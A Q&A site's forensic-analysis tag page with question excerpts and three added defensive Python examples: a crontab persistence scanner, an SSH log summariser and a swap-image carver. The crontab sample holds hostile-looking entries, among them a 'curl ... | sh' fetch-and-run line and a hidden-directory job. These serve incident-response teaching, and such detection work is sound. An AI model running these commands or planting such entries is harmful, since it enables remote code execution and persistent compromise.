Questions tagged [forensic-analysis]

12 questions
15 votes, 8 answers

What are the main steps for doing forensic analysis of a Linux box after it was hacked?

What are the main steps for doing forensic analysis of a Linux box after it was hacked? Let's say it is a generic Linux server (mail/web/database/ftp/ssh/samba), and it started sending spam and scanning other systems. How to start searching for ways the hack was done…
Kazimieras Aliulis
  • 2,324
  • 2
  • 26
  • 45
10 votes, 2 answers

My linux server was hacked. How do I find out how and when it was done?

I have a home server running a desktop Ubuntu distribution. I found this in my crontab: * * * * * /home/username/ /.access.log/y2kupdate >/dev/null 2>&1 and when looking in that directory (the space after username/ is a directory name) I found a lot…
Jonatan Kallus
  • 203
  • 2
  • 6
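The first question above asks where to start looking for how a box was compromised, and the second shows the classic place to look first: an unexplained crontab entry with a hidden directory and discarded output. The scanner below is an added example, not code from either post; it parses crontab lines and flags the persistence indicators a responder checks by hand (every-minute or @reboot schedules, hidden path components, a directory whose name is whitespace, execution from /tmp or /dev/shm, output thrown away, download-and-execute). The sample crontab is constructed: it contains the line quoted in the second post plus hypothetical entries, and 198.51.100.7 is a documentation address.

```python
"""Flag persistence-style crontab entries (added example; constructed sample data)."""
import re
from dataclasses import dataclass, field

CRON_FIELDS = 5
# A path component that starts with "." but is not "." or ".." (e.g. /.access.log)
HIDDEN_COMPONENT = re.compile(r"(^|/)\.[^/\s.]")
# Output deliberately thrown away at the end of the command line
SILENCED = re.compile(r">\s*/dev/null(\s+2>&1)?\s*$")
# Fetch-and-run or decode-and-run patterns
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\bbase64\s+(-d|--decode)\b")
VOLATILE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def parse_crontab_line(line):
    """Split one crontab line into (schedule, command); None for comments, env lines, blanks."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if stripped.startswith("@"):                      # @reboot, @hourly, ...
        parts = stripped.split(None, 1)
        return tuple(parts) if len(parts) == 2 else None
    if "=" in stripped.split()[0]:                    # MAILTO=..., PATH=...
        return None
    parts = stripped.split(None, CRON_FIELDS)
    if len(parts) <= CRON_FIELDS:
        return None
    return " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]


def suspicious_reasons(schedule, command):
    """Heuristics only: each hit is a reason to look, not proof of compromise."""
    reasons = []
    if schedule in ("* * * * *", "@reboot"):
        reasons.append("runs every minute or at boot")
    if HIDDEN_COMPONENT.search(command):
        reasons.append("hidden path component")
    tokens = command.split()
    # "/home/user/" followed by "/.dir/bin": a directory whose name is whitespace
    if any(a.startswith("/") and a.endswith("/") and b.startswith("/")
           for a, b in zip(tokens, tokens[1:])):
        reasons.append("directory name containing whitespace")
    if any(d in command for d in VOLATILE_DIRS):
        reasons.append("executes from a world-writable temp dir")
    if SILENCED.search(command):
        reasons.append("output discarded")
    if DOWNLOAD_EXEC.search(command):
        reasons.append("download-and-execute")
    return reasons


def scan_crontab(text):
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parsed = parse_crontab_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = suspicious_reasons(schedule, command)
        if reasons:
            findings.append(Finding(n, schedule, command, reasons))
    return findings


# Constructed sample: one legitimate job plus the entry quoted in the post above
SAMPLE_CRONTAB = """\
# constructed sample crontab
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * /home/username/ /.access.log/y2kupdate >/dev/null 2>&1
@reboot /dev/shm/.x/run.sh
*/5 * * * * curl -s http://198.51.100.7/p | sh
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.schedule} {f.command}\n    {', '.join(f.reasons)}")
```

On a real box run it over every crontab, not just the user's: /etc/crontab, /etc/cron.d/*, /var/spool/cron/crontabs/*, and the systemd timers, and do it from a mounted image or a known-good binary, since a rootkit on the live system may hide the entry from the local crontab command.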
4 votes, 1 answer

How to disable automatic garbage collection on an SSD?

Solid State Drives (SSDs) have a garbage collection functionality which makes space from deleted files available. It is triggered automatically by the drive via a TRIM command sent by the OS. Is there a way to put an SSD in a state where the…
WoJ
  • 3,365
  • 8
  • 46
  • 75
4 votes, 2 answers

Virtual machine memory space forensics

In spite of the fact that the main point of virtualization is having "containerized" environments for every instanced OS without sharing memory space, are there techniques to do forensics on either online or offline (paused) virtual…
2 votes, 2 answers

Sending ESXi Snapshot to 3rd party forensics team

We recently had a couple of security events occur and we immediately took a snapshot of the VM, as we wanted to preserve as much of the data as we could. Now we would like to send it to a 3rd-party forensics team to determine the level of compromise. My…
1 vote, 1 answer

Finding email read times on exchange server

I'm trying to do a forensic analysis on an Exchange server, and I'd like to determine what time a user read a particular email. Is there any way, perhaps with a tool like mfcmapi or another open source or commercial tool, that can provide this…
1 vote, 2 answers

What are my options with a downloaded Rackspace cloud image?

I've got an unresponsive Rackspace slice that has defied all attempts at accessing it. I created an emergency image from this and deleted it, downloading the files that comprise the image to a local source. There are a number of files / assets I…
0 votes, 1 answer

Examine contents of unused space on the HDD

When using managed dedicated services, either virtual or physical, where you're presented with complete control to an operating system installed on some piece of hardware you don't have physical access to, is there any good way to test whether the…
cnst
  • 12,948
  • 7
  • 51
  • 75
0 votes, 2 answers

How can I analyze an encrypted HDD?

I have an HDD which I encrypted a few years ago, but I can't remember the tool I used. How can I find out if I have used TrueCrypt or VeraCrypt to encrypt my hard drive? Thanks.
0 votes, 2 answers

What logs should I check after a break-in?

I've asked this same question on superuser but I didn't have that much success. I'd like to learn more about forensic analysis, and I'm doing the challenges from Project Honeynet. I need to check the logfiles and see the IPs that connected remotely to…
Geo
  • 157
  • 7
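For the "which IPs connected remotely" part of the question above, the first log to read on a Linux host is the SSH authentication log (/var/log/auth.log on Debian and Ubuntu, /var/log/secure on Red Hat derivatives). The parser below is an added example, not part of the post or of the Honeynet challenge material: it extracts OpenSSH Accepted/Failed lines, summarises each source address, and singles out the pattern that usually marks the break-in, a burst of failures from one address followed by a success. The log lines are constructed (documentation addresses 203.0.113.0/24 and 192.0.2.0/24); real logs may use ISO timestamps under journald, which this regex does not cover.

```python
"""Summarise remote SSH logins from an auth.log (added example; constructed sample)."""
import re
from dataclasses import dataclass, field

# OpenSSH auth-log lines in traditional syslog format, e.g.
#   Mar  4 02:11:09 host sshd[2210]: Failed password for root from 203.0.113.5 port 41222 ssh2
SSHD_AUTH = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


@dataclass
class RemoteHost:
    ip: str
    accepted: int = 0
    failed: int = 0
    users: set = field(default_factory=set)
    first_seen: str = ""
    last_seen: str = ""


def summarise_sshd(log_text):
    """Map source IP -> RemoteHost. Assumes lines appear in chronological order."""
    hosts = {}
    for line in log_text.splitlines():
        m = SSHD_AUTH.match(line)
        if m is None:                      # pam_unix, CRON, sudo, ... are ignored here
            continue
        host = hosts.setdefault(m["ip"], RemoteHost(m["ip"]))
        if m["result"] == "Accepted":
            host.accepted += 1
        else:
            host.failed += 1
        host.users.add(m["user"])
        if not host.first_seen:
            host.first_seen = m["ts"]
        host.last_seen = m["ts"]
    return hosts


def brute_force_then_success(hosts, min_failures=5):
    """IPs that failed repeatedly and then got in: the classic password-guessing intrusion."""
    return sorted(ip for ip, h in hosts.items()
                  if h.failed >= min_failures and h.accepted > 0)


# Constructed sample log: a password-guessing run that succeeds, then a normal admin login
SAMPLE_AUTH_LOG = """\
Mar  4 02:11:09 honeypot sshd[2210]: Failed password for root from 203.0.113.5 port 41222 ssh2
Mar  4 02:11:12 honeypot sshd[2210]: Failed password for root from 203.0.113.5 port 41222 ssh2
Mar  4 02:11:15 honeypot sshd[2212]: Failed password for invalid user admin from 203.0.113.5 port 41230 ssh2
Mar  4 02:11:18 honeypot sshd[2214]: Failed password for invalid user oracle from 203.0.113.5 port 41236 ssh2
Mar  4 02:11:21 honeypot sshd[2216]: Failed password for root from 203.0.113.5 port 41240 ssh2
Mar  4 02:11:27 honeypot sshd[2218]: Accepted password for root from 203.0.113.5 port 41244 ssh2
Mar  4 02:12:40 honeypot sshd[2220]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar  4 08:30:02 honeypot sshd[2301]: Accepted publickey for alice from 192.0.2.10 port 55010 ssh2
Mar  4 09:00:00 honeypot CRON[2400]: (root) CMD (run-parts /etc/cron.hourly)
"""

if __name__ == "__main__":
    hosts = summarise_sshd(SAMPLE_AUTH_LOG)
    for h in hosts.values():
        print(f"{h.ip}: {h.accepted} accepted, {h.failed} failed, users={sorted(h.users)}, "
              f"{h.first_seen} .. {h.last_seen}")
    print("brute force then success:", brute_force_then_success(hosts))
```

Cross-check the result against the binary login records (wtmp via last, btmp via lastb) and the web and mail logs for the same window; an attacker who got a shell usually cleans the text logs first, so disagreement between sources is itself evidence.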
0 votes, 3 answers

How to mount the dd image of a swap file

I have several dd images from a single drive. One of them is the swap. I mounted all of the images in Ubuntu just fine except for the image of the swap. This is how the dd images break down: hda8 is /, hda1 is /boot, hda6 is /home, hda5 is /usr,…
Todd7912
  • 3
  • 3
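The swap image in the question above cannot be mounted because a swap partition carries no filesystem: its first page holds a small header written by mkswap (a magic string at the end of the page, a version, the last usable page number, a UUID and a label), and everything after it is raw paged-out process memory. The right moves are therefore to confirm the image is swap by reading that header and then to carve it for strings, the way strings(1) or bulk_extractor would. The code below is an added example, not from the post; it builds a constructed four-page swap image in memory, parses the header, and carves it. It assumes a 4 KiB page size and little-endian byte order (an x86 system), and the "paged-out" fragments it plants are made up.

```python
"""Identify a Linux swap image and carve strings from it (added example; constructed image)."""
import re
import struct
import uuid

PAGE_SIZE = 4096            # assumption: image made on a 4 KiB-page system (x86)
HEADER_OFFSET = 1024        # mkswap leaves the first 1 KiB untouched for boot blocks
MAGIC_LEN = 10              # "SWAPSPACE2" (v1) or "SWAP-SPACE" (v0) ends the first page


def parse_swap_header(image):
    """Read the swap header from the first page; raises ValueError if it is not swap."""
    page = image[:PAGE_SIZE]
    magic = bytes(page[PAGE_SIZE - MAGIC_LEN:PAGE_SIZE])
    if magic == b"SWAP-SPACE":
        return {"magic": "SWAP-SPACE", "version": 0}
    if magic != b"SWAPSPACE2":
        raise ValueError("no swap signature at end of first page")
    # struct swap_header.info: version, last_page, nr_badpages (u32, host order),
    # then uuid[16] and volume_name[16]; "<" assumes a little-endian host
    version, last_page, nr_badpages = struct.unpack_from("<III", page, HEADER_OFFSET)
    raw_uuid = bytes(page[HEADER_OFFSET + 12:HEADER_OFFSET + 28])
    raw_label = bytes(page[HEADER_OFFSET + 28:HEADER_OFFSET + 44])
    return {
        "magic": "SWAPSPACE2",
        "version": version,
        "last_page": last_page,
        "nr_badpages": nr_badpages,
        "uuid": str(uuid.UUID(bytes=raw_uuid)),
        "label": raw_label.split(b"\0", 1)[0].decode("ascii", "replace"),
        "size_bytes": (last_page + 1) * PAGE_SIZE,
    }


def carve_strings(image, min_len=8, skip_header_page=True):
    """Like strings(1): printable ASCII runs, skipping the header page by default."""
    start = PAGE_SIZE if skip_header_page else 0
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(image[start:])]


def build_sample_image(pages=4, label=b"forensic-demo"):
    """Constructed test data laid out the way mkswap writes a v1 header."""
    img = bytearray(pages * PAGE_SIZE)
    struct.pack_into("<III", img, HEADER_OFFSET, 1, pages - 1, 0)
    img[HEADER_OFFSET + 12:HEADER_OFFSET + 28] = uuid.UUID("0f1e2d3c-4b5a-6978-8796-a5b4c3d2e1f0").bytes
    img[HEADER_OFFSET + 28:HEADER_OFFSET + 28 + len(label)] = label
    img[PAGE_SIZE - MAGIC_LEN:PAGE_SIZE] = b"SWAPSPACE2"
    # Fake paged-out process memory in later pages (constructed, not real captures)
    for offset, fragment in (
        (PAGE_SIZE + 100, b"ssh -p 2222 root@203.0.113.5\0"),
        (2 * PAGE_SIZE + 7, b"GET /y2kupdate HTTP/1.1\r\nHost: 203.0.113.5\r\n\0"),
    ):
        img[offset:offset + len(fragment)] = fragment
    return bytes(img)


if __name__ == "__main__":
    img = build_sample_image()
    print(parse_swap_header(img))
    for s in carve_strings(img):
        print(repr(s))
```

On a real image, file(1) and blkid will report the same header fields; if the header is missing or encrypted (swap on dm-crypt with a random key) the image is still worth carving, but nothing in it will be recoverable without the key.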
0 votes, 1 answer

Is there a (forensic) way to list past events/actions of a certain *.exe malware program (PUP-Proxygate, possibly a Trojan)?

There is a folder with suspicious *.exe files on a Win 10 PC, and there are (external) protocols of potentially unlawful actions coming from that PC at a certain time in the past. The first suspicious action was network traffic to a sinkhole IP…
David.P
  • 119
  • 5